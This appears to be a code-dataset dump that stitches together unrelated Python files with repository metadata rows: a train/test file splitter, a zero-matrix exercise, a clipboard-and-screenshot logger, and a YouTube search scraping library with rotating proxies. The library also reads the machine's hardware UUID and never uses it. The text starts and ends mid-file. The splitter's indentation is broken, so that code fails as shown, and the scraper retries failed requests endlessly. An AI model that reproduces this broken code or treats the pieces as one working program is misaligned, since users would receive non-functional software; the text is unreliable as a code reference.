print(rotate_word("The Quick Brown Fox Jumps Over The Lazy Dog", 13))"""
|
derinsola01/Projects
|
chapter8codes.py
|
chapter8codes.py
|
py
| 2,589 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17334218878
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import re,os,sys
import random
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--per', dest='per', type=int, default=10, help='ratio of test set (%)')
parser.add_argument('--file', dest='file', type=str, default='data_from_USPTO_utf8_converted_clear', help='input file')
args = parser.parse_args()
params = vars(args)
print(params)
file = params['file']
test_percent = params['per']
# select n% as test set
def select_file(fin,test_p):
    lines = open(fin, 'r+').readlines()[1:]  # skip the first (title) line
    writer1 = open(fin + '_train', 'w')
    writer2 = open(fin + '_test', 'w')
all_num = len(lines)
test_num = int(all_num*(test_p*0.01))
print('all num: %d' %all_num)
print('test num: %d' %test_num)
print('train num: %d' %(all_num-test_num))
    print('selecting...')
test_set = random.sample(lines, test_num)
for item in test_set:
lines.remove(item)
print('selected')
writer1.writelines(lines)
writer2.writelines(test_set)
select_file(file, test_percent)
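# Example invocation (an illustrative sketch using the defaults declared above):
#   python select_file.py --file data_from_USPTO_utf8_converted_clear --per 10
# which writes <file>_train and <file>_test next to the input file.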
|
jshmjs45/data_for_chem
|
codes/select_file.py
|
select_file.py
|
py
| 1,111 |
python
|
en
|
code
| 13 |
github-code
|
6
|
38153977020
|
#if an element in an m x n matrix is 0, its entire
#row and column are set to zero
#O(m*n) solution: loops through matrix twice,
#first time to find the rows and columns with zeros
#in them, and second time to assign each value in those
#rows cols to zero
def zero_matrix(m):
row = {}
col = {}
for i in range(len(m)):
for j in range(len(m[0])):
if(m[i][j] == 0):
if(i not in row):
row[i] = 1
if(j not in col):
col[j] = 1
#set all vals in row to zero
for i in row:
for j in range(len(m[0])):
m[i][j] = 0
#set all vals in col to zero
for j in col:
for i in range(len(m)):
m[i][j] = 0
return(m)
m = [[1,0,1,1],[1,1,1,1],[0,1,1,0],[1,1,1,1]]
print(zero_matrix(m))
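# A constant-extra-space variant, shown as a sketch for comparison (assumption: the same
# rectangular list-of-lists input; the first row and column are reused as zero markers).
def zero_matrix_v2(m):
    first_row_zero = any(v == 0 for v in m[0])
    first_col_zero = any(r[0] == 0 for r in m)
    # mark zero rows/columns in the first row and column
    for i in range(1, len(m)):
        for j in range(1, len(m[0])):
            if m[i][j] == 0:
                m[i][0] = 0
                m[0][j] = 0
    # zero out cells flagged by the markers
    for i in range(1, len(m)):
        for j in range(1, len(m[0])):
            if m[i][0] == 0 or m[0][j] == 0:
                m[i][j] = 0
    if first_row_zero:
        m[0] = [0] * len(m[0])
    if first_col_zero:
        for r in m:
            r[0] = 0
    return m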
|
BlakeMcMurray/Coding-Problem-Solutions
|
Arrays/zeroMatrix.py
|
zeroMatrix.py
|
py
| 842 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37616127622
|
import time
import os
from richxerox import *
from tinydb import TinyDB, where
HOME_DIR = 'static/db'
# Create directory if it doesn't exist
os.system("mkdir %s" % HOME_DIR)
db = TinyDB('%s/db.json' % HOME_DIR)
currently_found_in_clipboard = paste(format='text')
while True:
time.sleep(0.1) # one tenth of a second
if paste(format='text') != currently_found_in_clipboard:
currently_found_in_clipboard = paste(format='text')
# When the user hits CMD+C store the clipboard in a file and take a screenshot of the screen
created_at = time.time()
entry = { 'content': pasteall(), 'created_at': int(created_at),}
entry['screenshot'] = '%s/screen%s.png' % (HOME_DIR, created_at)
os.system("screencapture %s" % entry['screenshot'])
db.insert(entry)
|
pantacuzino/personalkb
|
script.py
|
script.py
|
py
| 807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71520783227
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
from detectron2.detectron2.layers import FrozenBatchNorm2d, ShapeSpec, get_norm
_NORM = 'BN'
class Conv2d_BN(nn.Module):
"""Convolution with BN module."""
def __init__(
self,
in_ch,
out_ch,
kernel_size=1,
stride=1,
pad=0,
dilation=1,
groups=1,
bn_weight_init=1,
act_layer=None,
):
super().__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.conv = torch.nn.Conv2d(in_ch,
out_ch,
kernel_size,
stride,
pad,
dilation,
groups,
bias=False
)
self.bn = get_norm(_NORM, out_ch)
torch.nn.init.constant_(self.bn.weight, bn_weight_init)
torch.nn.init.constant_(self.bn.bias, 0)
for m in self.modules():
if isinstance(m, nn.Conv2d):
# Note that there is no bias due to BN
fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))
self.act_layer = act_layer() if act_layer is not None else nn.Identity()
def forward(self, x):
# ain = self.in_ch
# aout = self.out_ch
x = self.conv(x)
x = self.bn(x)
x = self.act_layer(x)
return x
class Dila_PRM(nn.Module):
def __init__(self,in_embed,out_embed,kernel_size=4,downsample_ratio=1,dilations=[2,4,6],
fusion='cat'):
super().__init__()
self.dilations = dilations
self.in_embed = in_embed
# self.in_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4]
# self.out_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4]
self.out_embed = out_embed
self.fusion = fusion
self.kernel_size = kernel_size
self.stride = downsample_ratio
#self.out_size = img_size//downsample_ratio
self.convs = nn.ModuleList(
[
nn.Sequential(
nn.Conv2d(
in_channels=self.in_embed,
out_channels=self.in_embed,
kernel_size=self.kernel_size,
stride=self.stride,
# padding=math.ceil(((self.kernel_size-1)*self.dilations[idx] + 1 - self.stride) / 2),
padding=math.ceil(((self.kernel_size-1)*self.dilations[idx])/2),
dilation=self.dilations[idx]),
# nn.BatchNorm2d(self.in_embed),
nn.GELU()
) for idx in range(len(self.dilations))
]
)
if self.fusion == 'cat':
self.outchans = self.in_embed * len(self.dilations)
            # This could be tweaked: keep the feature dimensions of the different scales as small as possible
#self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.in_embed,act_layer=nn.Hardswish)
self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.out_embed,act_layer=nn.Hardswish)
def forward(self,x):
B,C,H,W = x.shape #1,3,320,320
out = self.convs[0](x).unsqueeze(dim=-1)
for i in range(1,len(self.dilations)):
cur_out = self.convs[i](x).unsqueeze(dim=-1)
out = torch.cat((cur_out,out),dim=-1)
B, C, W, H, N = out.shape
#cur_size = (W,H)
if self.fusion=='cat':
out = out.permute(0,4,1,2,3).reshape(B,N*C,W,H)
out = self.aggerate(out)
# out = out.flatten(2).transpose(1,2) #B,N,C
return out
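# Shape sanity-check sketch (assumptions: detectron2 importable as above, a 64-channel
# input at 80x80, the default kernel_size/dilations, and downsample_ratio=1 so the
# chosen paddings keep the spatial size; values are illustrative only):
#
#   prm = Dila_PRM(in_embed=64, out_embed=128, kernel_size=4, downsample_ratio=1)
#   y = prm(torch.randn(1, 64, 80, 80))   # expected shape: (1, 128, 80, 80)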
|
LiaoYun0x0/BiFormer
|
models/dila_prm.py
|
dila_prm.py
|
py
| 4,008 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40467207556
|
def solution(box):
maxBox = max(box)
if maxBox == box[0]:
return box[0]
start, end = 0, maxBox
answer = maxBox
while start <= end:
mid = (start + end) // 2
crit = 0
for b in box:
crit += b - mid
if crit > 0:
start = mid + 1
break
        if crit <= 0:
end = mid - 1
answer = min(answer, mid)
else:
start = mid + 1
return answer
print(solution([500, 999, 400]))
|
Cho-El/coding-test-practice
|
프로그래머스 문제/파이썬/2022 카카오 채용연계형 겨울 테크 인턴십 코딩테스트/3.py
|
3.py
|
py
| 552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30375207065
|
from random import randint
de = randint(1,6)
print(de)
secret = randint(0,1000)
for essai in range(10):
print("Devinez mon nombre secret :")
nombreSaisi = int(input())
if nombreSaisi == secret:
print("Bravo, vous êtes perspicace.")
break
else:
print("Et non, bien tenté.")
|
vguisse/job
|
2nde/algo/entree_test/ex4.py
|
ex4.py
|
py
| 318 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
8772037717
|
import requests,re,threading,os, sys,random,copy,random,json,httpx,hashlib
from loguru import logger
from wmi import WMI
from urllib.request import urlopen, Request
from time import sleep
from colorama import init, Fore, Style
from urllib.parse import urlencode
from typing import Union, List
__version__ = "2-5"
HWID = WMI().Win32_ComputerSystemProduct()[0].UUID
CLIENTS = {
"MWEB": {
'context': {
'client': {
'clientName': 'MWEB',
'clientVersion': '2.20211109.01.00'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"ANDROID": {
'context': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.20'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"ANDROID_EMBED": {
'context': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.20',
'clientScreen': 'EMBED'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"TV_EMBED": {
"context": {
"client": {
"clientName": "TVHTML5_SIMPLY_EMBEDDED_PLAYER",
"clientVersion": "2.0"
},
"thirdParty": {
"embedUrl": "https://www.youtube.com/",
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
}
}
requestPayload = {
"context": {
"client": {
"clientName": "WEB",
"clientVersion": "2.20210224.06.00",
"newVisitorCookie": True,
},
"user": {
"lockedSafetyMode": False,
}
}
}
userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'
searchKey = 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
videoElementKey = 'videoRenderer'
channelElementKey = 'channelRenderer'
playlistElementKey = 'playlistRenderer'
shelfElementKey = 'shelfRenderer'
itemSectionKey = 'itemSectionRenderer'
continuationItemKey = 'continuationItemRenderer'
richItemKey = 'richItemRenderer'
hashtagVideosPath = ['contents', 'twoColumnBrowseResultsRenderer', 'tabs', 0, 'tabRenderer', 'content', 'richGridRenderer', 'contents']
hashtagContinuationVideosPath = ['onResponseReceivedActions', 0, 'appendContinuationItemsAction', 'continuationItems']
contentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'sectionListRenderer', 'contents']
fallbackContentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'richGridRenderer', 'contents']
continuationContentPath = ['onResponseReceivedCommands', 0, 'appendContinuationItemsAction', 'continuationItems']
continuationKeyPath = ['continuationItemRenderer', 'continuationEndpoint', 'continuationCommand', 'token']
def getValue(source: dict, path: List[str]) -> Union[str, int, dict, None]:
value = source
for key in path:
if type(key) is str:
if key in value.keys():
value = value[key]
else:
value = None
break
elif type(key) is int:
if len(value) != 0:
value = value[key]
else:
value = None
break
return value
def getVideoId(videoLink: str) -> str:
if 'youtu.be' in videoLink:
if videoLink[-1] == '/':
return videoLink.split('/')[-2]
return videoLink.split('/')[-1]
elif 'youtube.com' in videoLink:
if '&' not in videoLink:
return videoLink[videoLink.index('v=') + 2:]
return videoLink[videoLink.index('v=') + 2: videoLink.index('&')]
else:
return videoLink
class ComponentHandler:
def _getVideoComponent(self, element: dict, shelfTitle: str = None) -> dict:
video = element[videoElementKey]
component = {
'type': 'video',
'id': self._getValue(video, ['videoId']),
'title': self._getValue(video, ['title', 'runs', 0, 'text']),
'publishedTime': self._getValue(video, ['publishedTimeText', 'simpleText']),
'duration': self._getValue(video, ['lengthText', 'simpleText']),
'viewCount': {
'text': self._getValue(video, ['viewCountText', 'simpleText']),
'short': self._getValue(video, ['shortViewCountText', 'simpleText']),
},
'thumbnails': self._getValue(video, ['thumbnail', 'thumbnails']),
'richThumbnail': self._getValue(video, ['richThumbnail', 'movingThumbnailRenderer', 'movingThumbnailDetails', 'thumbnails', 0]),
'descriptionSnippet': self._getValue(video, ['detailedMetadataSnippets', 0, 'snippetText', 'runs']),
'channel': {
'name': self._getValue(video, ['ownerText', 'runs', 0, 'text']),
'id': self._getValue(video, ['ownerText', 'runs', 0, 'navigationEndpoint', 'browseEndpoint', 'browseId']),
'thumbnails': self._getValue(video, ['channelThumbnailSupportedRenderers', 'channelThumbnailWithLinkRenderer', 'thumbnail', 'thumbnails']),
},
'accessibility': {
'title': self._getValue(video, ['title', 'accessibility', 'accessibilityData', 'label']),
'duration': self._getValue(video, ['lengthText', 'accessibility', 'accessibilityData', 'label']),
},
}
component['link'] = 'https://www.youtube.com/watch?v=' + component['id']
component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id']
component['shelfTitle'] = shelfTitle
return component
def _getChannelComponent(self, element: dict) -> dict:
channel = element[channelElementKey]
component = {
'type': 'channel',
'id': self._getValue(channel, ['channelId']),
'title': self._getValue(channel, ['title', 'simpleText']),
'thumbnails': self._getValue(channel, ['thumbnail', 'thumbnails']),
'videoCount': self._getValue(channel, ['videoCountText', 'runs', 0, 'text']),
'descriptionSnippet': self._getValue(channel, ['descriptionSnippet', 'runs']),
'subscribers': self._getValue(channel, ['subscriberCountText', 'simpleText']),
}
component['link'] = 'https://www.youtube.com/channel/' + component['id']
return component
def _getVideoFromChannelSearch(self, elements: list) -> list:
channelsearch = []
for element in elements:
element = self._getValue(element, ["childVideoRenderer"])
json = {
"id": self._getValue(element, ["videoId"]),
"title": self._getValue(element, ["title", "simpleText"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"duration": {
"simpleText": self._getValue(element, ["lengthText", "simpleText"]),
"text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"])
}
}
channelsearch.append(json)
return channelsearch
def _getChannelSearchComponent(self, elements: list) -> list:
channelsearch = []
for element in elements:
responsetype = None
if 'gridPlaylistRenderer' in element:
element = element['gridPlaylistRenderer']
responsetype = 'gridplaylist'
elif 'itemSectionRenderer' in element:
first_content = element["itemSectionRenderer"]["contents"][0]
if 'videoRenderer' in first_content:
element = first_content['videoRenderer']
responsetype = "video"
elif 'playlistRenderer' in first_content:
element = first_content["playlistRenderer"]
responsetype = "playlist"
else:
raise Exception(f'Unexpected first_content {first_content}')
elif 'continuationItemRenderer' in element:
# for endless scrolling, not needed here
# TODO: Implement endless scrolling
continue
else:
raise Exception(f'Unexpected element {element}')
if responsetype == "video":
json = {
"id": self._getValue(element, ["videoId"]),
"thumbnails": {
"normal": self._getValue(element, ["thumbnail", "thumbnails"]),
"rich": self._getValue(element, ["richThumbnail", "movingThumbnailRenderer", "movingThumbnailDetails", "thumbnails"])
},
"title": self._getValue(element, ["title", "runs", 0, "text"]),
"descriptionSnippet": self._getValue(element, ["descriptionSnippet", "runs", 0, "text"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"views": {
"precise": self._getValue(element, ["viewCountText", "simpleText"]),
"simple": self._getValue(element, ["shortViewCountText", "simpleText"]),
"approximate": self._getValue(element, ["shortViewCountText", "accessibility", "accessibilityData", "label"])
},
"duration": {
"simpleText": self._getValue(element, ["lengthText", "simpleText"]),
"text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"])
},
"published": self._getValue(element, ["publishedTimeText", "simpleText"]),
"channel": {
"name": self._getValue(element, ["ownerText", "runs", 0, "text"]),
"thumbnails": self._getValue(element, ["channelThumbnailSupportedRenderers", "channelThumbnailWithLinkRenderer", "thumbnail", "thumbnails"])
},
"type": responsetype
}
elif responsetype == 'playlist':
json = {
"id": self._getValue(element, ["playlistId"]),
"videos": self._getVideoFromChannelSearch(self._getValue(element, ["videos"])),
"thumbnails": {
"normal": self._getValue(element, ["thumbnails"]),
},
"title": self._getValue(element, ["title", "simpleText"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"channel": {
"name": self._getValue(element, ["longBylineText", "runs", 0, "text"]),
},
"type": responsetype
}
else:
json = {
"id": self._getValue(element, ["playlistId"]),
"thumbnails": {
"normal": self._getValue(element, ["thumbnail", "thumbnails", 0]),
},
"title": self._getValue(element, ["title", "runs", 0, "text"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"type": 'playlist'
}
channelsearch.append(json)
return channelsearch
def _getShelfComponent(self, element: dict) -> dict:
shelf = element[shelfElementKey]
return {
'title': self._getValue(shelf, ['title', 'simpleText']),
'elements': self._getValue(shelf, ['content', 'verticalListRenderer', 'items']),
}
def _getValue(self, source: dict, path: List[str]) -> Union[str, int, dict, None]:
value = source
for key in path:
if type(key) is str:
if key in value.keys():
value = value[key]
else:
value = None
break
elif type(key) is int:
if len(value) != 0:
value = value[key]
else:
value = None
break
return value
class RequestHandler(ComponentHandler):
def _makeRequest(self) -> None:
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
if self.searchPreferences:
requestBody['params'] = self.searchPreferences
if self.continuationKey:
requestBody['continuation'] = self.continuationKey
requestBodyBytes = json.dumps(requestBody).encode('utf_8')
request = Request(
'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({
'key': searchKey,
}),
data = requestBodyBytes,
headers = {
'Content-Type': 'application/json; charset=utf-8',
'Content-Length': len(requestBodyBytes),
'User-Agent': userAgent,
}
)
try:
self.response = urlopen(request, timeout=self.timeout).read().decode('utf_8')
except (Exception,):
return self._makeRequest()
def _parseSource(self) -> None:
try:
if not self.continuationKey:
responseContent = self._getValue(json.loads(self.response), contentPath)
else:
responseContent = self._getValue(json.loads(self.response), continuationContentPath)
if responseContent:
for element in responseContent:
if itemSectionKey in element.keys():
self.responseSource = self._getValue(element, [itemSectionKey, 'contents'])
if continuationItemKey in element.keys():
self.continuationKey = self._getValue(element, continuationKeyPath)
else:
self.responseSource = self._getValue(json.loads(self.response), fallbackContentPath)
self.continuationKey = self._getValue(self.responseSource[-1], continuationKeyPath)
except:
raise Exception('ERROR: Could not parse YouTube response.')
class RequestCore:
def __init__(self):
self.url = None
self.data = None
self.timeout = 2
self.proxy = []
proxy = open("proxy.txt", "r").read().splitlines()
for p in proxy:
p_split = p.split(':')
if len(p_split) == 2:#ip:port
self.proxy.append({"http://": "http://"+p})
elif len(p_split) == 4:#ip:port:login:password
self.proxy.append({"http://": f"http://{p_split[2]}:{p_split[3]}@{p_split[0]}:{p_split[1]}"})
elif '@' in p:#login:password@ip:port
self.proxy.append({"http://": "http://"+p})
def syncPostRequest(self) -> httpx.Response:
try:
r = httpx.post(
self.url,
headers={"User-Agent": userAgent},
json=self.data,
timeout=self.timeout,
proxies=random.choice(self.proxy)
)
if r.status_code == 200:
return r
else:
return self.syncPostRequest()
except (Exception,):
return self.syncPostRequest()
async def asyncPostRequest(self) -> httpx.Response:
try:
async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client:
r = await client.post(self.url, headers={"User-Agent": userAgent}, json=self.data, timeout=self.timeout)
if r.status_code == 200:
return r
else:
                    return await self.asyncPostRequest()
except (Exception,):
return await self.asyncPostRequest()
def syncGetRequest(self) -> httpx.Response:
try:
r = httpx.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout,
cookies={'CONSENT': 'YES+1'}, proxies=random.choice(self.proxy))
if r.status_code == 200:
return r
else:
return self.syncGetRequest()
except (Exception,):
return self.syncGetRequest()
async def asyncGetRequest(self) -> httpx.Response:
try:
async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client:
r = await client.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout,
cookies={'CONSENT': 'YES+1'})
if r.status_code == 200:
return r
else:
return await self.asyncGetRequest()
except (Exception,):
return await self.asyncGetRequest()
class VideoCore(RequestCore):
def __init__(self, videoLink: str, componentMode: str, resultMode: int, timeout: int, enableHTML: bool, overridedClient: str = "ANDROID"):
super().__init__()
self.timeout = timeout
self.resultMode = resultMode
self.componentMode = componentMode
self.videoLink = videoLink
self.enableHTML = enableHTML
self.overridedClient = overridedClient
# We call this when we use only HTML
def post_request_only_html_processing(self):
self.__getVideoComponent(self.componentMode)
self.result = self.__videoComponent
def post_request_processing(self):
self.__parseSource()
self.__getVideoComponent(self.componentMode)
self.result = self.__videoComponent
def prepare_innertube_request(self):
self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({
'key': searchKey,
'contentCheckOk': True,
'racyCheckOk': True,
"videoId": getVideoId(self.videoLink)
})
self.data = copy.deepcopy(CLIENTS[self.overridedClient])
async def async_create(self):
self.prepare_innertube_request()
response = await self.asyncPostRequest()
self.response = response.text
if response.status_code == 200:
self.post_request_processing()
else:
raise Exception('ERROR: Invalid status code.')
def sync_create(self):
self.prepare_innertube_request()
response = self.syncPostRequest()
self.response = response.text
if response.status_code == 200:
self.post_request_processing()
else:
raise Exception('ERROR: Invalid status code.')
def prepare_html_request(self):
self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({
'key': searchKey,
'contentCheckOk': True,
'racyCheckOk': True,
"videoId": getVideoId(self.videoLink)
})
self.data = CLIENTS["MWEB"]
def sync_html_create(self):
self.prepare_html_request()
response = self.syncPostRequest()
self.HTMLresponseSource = response.json()
async def async_html_create(self):
self.prepare_html_request()
response = await self.asyncPostRequest()
self.HTMLresponseSource = response.json()
def __parseSource(self) -> None:
try:
self.responseSource = json.loads(self.response)
except Exception as e:
raise Exception('ERROR: Could not parse YouTube response.')
def __result(self, mode: int) -> Union[dict, str]:
if mode == ResultMode.dict:
return self.__videoComponent
elif mode == ResultMode.json:
return json.dumps(self.__videoComponent, indent=4)
def __getVideoComponent(self, mode: str) -> None:
videoComponent = {}
if mode in ['getInfo', None]:
try:
responseSource = self.responseSource
except:
responseSource = None
if self.enableHTML:
responseSource = self.HTMLresponseSource
component = {
'id': getValue(responseSource, ['videoDetails', 'videoId']),
'title': getValue(responseSource, ['videoDetails', 'title']),
'duration': {
'secondsText': getValue(responseSource, ['videoDetails', 'lengthSeconds']),
},
'viewCount': {
'text': getValue(responseSource, ['videoDetails', 'viewCount'])
},
'thumbnails': getValue(responseSource, ['videoDetails', 'thumbnail', 'thumbnails']),
'description': getValue(responseSource, ['videoDetails', 'shortDescription']),
'channel': {
'name': getValue(responseSource, ['videoDetails', 'author']),
'id': getValue(responseSource, ['videoDetails', 'channelId']),
},
'allowRatings': getValue(responseSource, ['videoDetails', 'allowRatings']),
'averageRating': getValue(responseSource, ['videoDetails', 'averageRating']),
'keywords': getValue(responseSource, ['videoDetails', 'keywords']),
'isLiveContent': getValue(responseSource, ['videoDetails', 'isLiveContent']),
'publishDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate']),
'uploadDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate']),
'isFamilySafe': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'isFamilySafe']),
'category': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'category']),
}
component['isLiveNow'] = component['isLiveContent'] and component['duration']['secondsText'] == "0"
component['link'] = 'https://www.youtube.com/watch?v=' + component['id']
component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id']
videoComponent.update(component)
if mode in ['getFormats', None]:
videoComponent.update(
{
"streamingData": getValue(self.responseSource, ["streamingData"])
}
)
if self.enableHTML:
videoComponent["publishDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate'])
videoComponent["uploadDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate'])
self.__videoComponent = videoComponent
class ResultMode:
json = 0
dict = 1
class SearchMode:
videos = 'EgIQAQ%3D%3D'
channels = 'EgIQAg%3D%3D'
playlists = 'EgIQAw%3D%3D'
livestreams = 'EgJAAQ%3D%3D'
class Video:
@staticmethod
def get(videoLink: str, mode: int = ResultMode.dict, timeout: int = None, get_upload_date: bool = False) -> Union[
dict, str, None]:
vc = VideoCore(videoLink, None, mode, timeout, get_upload_date)
if get_upload_date:
vc.sync_html_create()
vc.sync_create()
return vc.result
class ChannelSearchCore(RequestCore, ComponentHandler):
response = None
responseSource = None
resultComponents = []
def __init__(self, query: str, language: str, region: str, searchPreferences: str, browseId: str, timeout: int):
super().__init__()
self.query = query
self.language = language
self.region = region
self.browseId = browseId
self.searchPreferences = searchPreferences
self.continuationKey = None
self.timeout = timeout
def sync_create(self):
self._syncRequest()
self._parseChannelSearchSource()
self.response = self._getChannelSearchComponent(self.response)
async def next(self):
await self._asyncRequest()
self._parseChannelSearchSource()
self.response = self._getChannelSearchComponent(self.response)
return self.response
def _parseChannelSearchSource(self) -> None:
try:
last_tab = self.response["contents"]["twoColumnBrowseResultsRenderer"]["tabs"][-1]
if 'expandableTabRenderer' in last_tab:
self.response = last_tab["expandableTabRenderer"]["content"]["sectionListRenderer"]["contents"]
else:
tab_renderer = last_tab["tabRenderer"]
if 'content' in tab_renderer:
self.response = tab_renderer["content"]["sectionListRenderer"]["contents"]
else:
self.response = []
except:
raise Exception('ERROR: Could not parse YouTube response.')
def _getRequestBody(self):
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
requestBody['params'] = self.searchPreferences
requestBody['browseId'] = self.browseId
self.url = 'https://www.youtube.com/youtubei/v1/browse' + '?' + urlencode({
'key': searchKey,
})
self.data = requestBody
def _syncRequest(self) -> None:
''' Fixes #47 '''
self._getRequestBody()
request = self.syncPostRequest()
try:
self.response = request.json()
except:
raise Exception('ERROR: Could not make request.')
async def _asyncRequest(self) -> None:
''' Fixes #47 '''
self._getRequestBody()
request = await self.asyncPostRequest()
try:
self.response = request.json()
except:
raise Exception('ERROR: Could not make request.')
def result(self, mode: int = ResultMode.dict) -> Union[str, dict]:
'''Returns the search result.
Args:
mode (int, optional): Sets the type of result. Defaults to ResultMode.dict.
Returns:
Union[str, dict]: Returns JSON or dictionary.
'''
if mode == ResultMode.json:
return json.dumps({'result': self.response}, indent=4)
elif mode == ResultMode.dict:
return {'result': self.response}
class SearchCore(RequestCore, RequestHandler, ComponentHandler):
response = None
responseSource = None
resultComponents = []
def __init__(self, query: str, limit: int, language: str, region: str, searchPreferences: str, timeout: int):
super().__init__()
self.query = query
self.limit = limit
self.language = language
self.region = region
self.searchPreferences = searchPreferences
self.timeout = timeout
self.continuationKey = None
def sync_create(self):
self._makeRequest()
self._parseSource()
def _getRequestBody(self):
''' Fixes #47 '''
requestBody = copy.deepcopy(requestPayload)
requestBody['query'] = self.query
requestBody['client'] = {
'hl': self.language,
'gl': self.region,
}
if self.searchPreferences:
requestBody['params'] = self.searchPreferences
if self.continuationKey:
requestBody['continuation'] = self.continuationKey
self.url = 'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({
'key': searchKey,
})
self.data = requestBody
def _makeRequest(self) -> None:
self._getRequestBody()
request = self.syncPostRequest()
try:
self.response = request.text
except:
raise Exception('ERROR: Could not make request.')
async def _makeAsyncRequest(self) -> None:
self._getRequestBody()
request = await self.asyncPostRequest()
try:
self.response = request.text
except:
raise Exception('ERROR: Could not make request.')
def result(self, mode: int = ResultMode.dict) -> Union[str, dict]:
if mode == ResultMode.json:
return json.dumps({'result': self.resultComponents}, indent=4)
elif mode == ResultMode.dict:
return {'result': self.resultComponents}
def _next(self) -> bool:
if self.continuationKey:
self.response = None
self.responseSource = None
self.resultComponents = []
self._makeRequest()
self._parseSource()
self._getComponents(*self.searchMode)
return True
else:
return False
async def _nextAsync(self) -> dict:
self.response = None
self.responseSource = None
self.resultComponents = []
await self._makeAsyncRequest()
self._parseSource()
self._getComponents(*self.searchMode)
return {
'result': self.resultComponents,
}
def _getComponents(self, findVideos: bool, findChannels: bool, findPlaylists: bool) -> None:
self.resultComponents = []
for element in self.responseSource:
if videoElementKey in element.keys() and findVideos:
self.resultComponents.append(self._getVideoComponent(element))
if channelElementKey in element.keys() and findChannels:
self.resultComponents.append(self._getChannelComponent(element))
if shelfElementKey in element.keys() and findVideos:
for shelfElement in self._getShelfComponent(element)['elements']:
self.resultComponents.append(
self._getVideoComponent(shelfElement, shelfTitle=self._getShelfComponent(element)['title']))
if richItemKey in element.keys() and findVideos:
richItemElement = self._getValue(element, [richItemKey, 'content'])
if videoElementKey in richItemElement.keys():
videoComponent = self._getVideoComponent(richItemElement)
self.resultComponents.append(videoComponent)
if len(self.resultComponents) >= self.limit:
break
class Search(SearchCore):
def __init__(self, query: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, True, True)
super().__init__(query, limit, language, region, None, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self) -> bool:
return self._next()
class VideosSearch(SearchCore):
def __init__(self, query: str, limit: int, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, False, False)
super().__init__(query, limit, language, region, SearchMode.videos, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self) -> bool:
return self._next()
class ChannelSearch(ChannelSearchCore):
def __init__(self, query: str, browseId: str, language: str = 'en', region: str = 'US', searchPreferences: str = "EgZzZWFyY2g%3D", timeout: int = None):
super().__init__(query, language, region, searchPreferences, browseId, timeout)
self.sync_create()
class CustomSearch(SearchCore):
def __init__(self, query: str, searchPreferences: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None):
self.searchMode = (True, True, True)
super().__init__(query, limit, language, region, searchPreferences, timeout)
self.sync_create()
self._getComponents(*self.searchMode)
def next(self):
self._next()
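# Illustrative, hypothetical usage of the search/video classes defined above. The helper
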